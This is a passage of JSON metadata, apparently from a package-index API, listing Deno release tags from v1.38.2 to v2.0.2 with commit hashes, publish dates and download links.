d":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.m